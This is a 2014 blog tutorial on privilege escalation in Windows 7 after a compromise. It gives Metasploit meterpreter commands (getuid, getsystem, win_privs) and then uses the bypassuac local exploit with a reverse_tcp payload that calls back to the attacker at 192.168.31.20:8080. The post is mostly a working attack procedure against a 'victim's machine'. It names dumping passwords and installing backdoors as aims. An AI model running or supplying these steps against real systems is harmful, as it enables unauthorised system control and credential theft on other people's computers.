Thursday, 20 November 2014

Bypass UAC and get admin privilege in windows 7 using metasploit




 Sometimes when you trying to exploit a security hole and success gain an access to the target system, usually you only act as logged user and it’s not a local system account. In this tips and trick there’s a simple step to escalate your privilege when you’re inside meterpreter. 
This picture below taken when hacked successfully gain an access using  Payload create by me. 
rsz_screenshot_from_2014-06-19_082326
 #meterpreter  >  getuid
When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. How do we do that to escalate our privilege to system account?.
The session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc. 
Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate   privileges.
 #meterpreter  >  use priv
 #meterpreter  >   getsystem
 make use of the ‘getsystem’ command, if its not already loaded we will need to first load the ‘priv’ extension.
We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any options. The script will attempt every method available to it, stopping when it succeeds.
There are situations where getsystem fails depending upon the operating system and exploiting method  we are using. Screenshot from 2014-06-17 19:30:14
 In this above image we are only getting access to normal system user  account  with less privileges, by executing    post/windows/gather/win_privs command it will list the privilege of the current users logged in. 
For this tutorial we are exploiting windows 7 as a victim’s machine and by executing a sysinfo command in your meterpeter shell you will get informations about your exploiting system. 
#meterpreter  >   sysinfo 
#meterpreter  >     run  post/windows/gather/win_privs 
If   the  getsystem  code detects that it is running on a Windows 7 with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method. 
When we executing  getsystem  command  it will fail because the  current logged user have not enough privilege to get admin roles and particularly in windows 7 UAC is defaulty enabled.
So we first try to bypass UAC enabled in windows  7, Luckily we have windows UAC bypass exploit in metasploit. 
Meterpreter on Kali no longer recognized “run bypassuac” instead  we had to use exploit/windows/local/bypassuac.
BypassUAC   exploit  that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems. 
For that  we need to background the session, and manually  try bypassuac exploit and load the session recently backgrounded and then exploit and execute  getsystem to get admin privilege. 
#meterpreter  > background 
#meterpreter  >   search uac 
#meterpreter  >   use exploit/windows/local/bypassuac 
I exploited this machine with the payload i created before,  so try the  method you used  for exploiting the machine before. 
#meterpreter  >   set payload windows/meterpreter/reverse_tcp 
#meterpreter  > set   LHOST 192.168.31.20 
#meterpreter  > set   LPORT  8080 
#meterpreter  >   set   SESSION 1 
#meterpreter  >    exploit 
Screenshot from 2014-06-17 19:34:24

Screenshot from 2014-06-17 19:35:07
 After getting acess try getsystem command. 
#meterpreter  >  getsystemScreenshot from 2014-06-17 19:36:15

No comments:

Post a Comment